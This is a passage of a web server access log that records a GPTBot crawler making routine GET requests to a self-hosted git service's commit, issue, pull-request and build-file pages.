+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs" [Client 74.7.227.38] [Length 21697] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:18:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:18:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:18:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:18:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:18:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:18:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:18:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=rendered" [Client 74.7.227.38] [Length 11268] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:18:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&state=closed&type=all" -[17/Feb/2026:18:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&state=closed&type=all" -[17/Feb/2026:18:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&state=open&type=all" -[17/Feb/2026:18:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&state=open&type=all" -[17/Feb/2026:18:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&state=closed&type=all" -[17/Feb/2026:18:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" -[17/Feb/2026:18:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 9959] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:18:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply" [Client 74.7.227.38] [Length 55211] [Gzip 12.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2fquery" [Client 74.7.227.38] [Length 24942] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query" -[17/Feb/2026:18:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13753] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:18:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fQUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 25664] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15215] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15214] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35734] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35739] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35737] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46759] [Gzip 22.23] 